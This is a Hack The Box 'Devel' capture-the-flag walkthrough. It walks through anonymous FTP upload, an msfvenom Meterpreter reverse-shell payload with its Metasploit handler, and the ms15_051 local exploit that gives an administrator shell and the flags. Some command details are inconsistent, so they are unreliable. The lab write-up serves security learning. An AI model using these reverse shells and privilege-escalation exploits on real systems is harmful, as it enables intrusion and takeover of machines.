Windows Privilege Escalation-I-HTB-Devel-Walkthrough
Windows Privilege Esacalation has a large area to be studied. Like UAC ByPass, there are lots of methods to gain high privileges.
Besides the manuel methods, Metasploit Framework has benefical modules for WinPrivesc. In the Devel room in HTB, we are focusing on metasploit. Lets look at the details.
- Lets start port scan with service and vulnerability with nmap.
We see that 21, 80th ports are open. Also anonymous ftp is allowed.
Microsoft ftpd is the service running.
2. Lets look at the server. And try to upload file with put command.
We use put command to upload a file.
3. When we look at the file that we have uploaded on the web page;
We can see the contents of the file. Thus, if we have a execution permisson, we can run a reverse shell.
The server is a windows server. Thus, the file is asp or aspx file ,most probably.
We can use msfvenom to create a reverse shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp -o reverse.aspand upload reverse.aspx file by using put command.
- Start msfconsole
use exploit/multi/handler
set LHOST
set payload windows/meterpreter/x64/reverse_tcp- Go to web page and run the file.
10.10.10.5/reverse.aspx
Bingoo! We got shell.
3. Lets background the shell and look at the privesc by using
local_exploit_suggester module
4. I look at the results and try them one by one.
exploit/windows/local/ms15_051_client_copy_image
works. I got high privileged shell.
in C:\Users\Administrator\Desktop\root.txt and
C:\Users\babis\Desktop\user.txt, I obtain the flags.
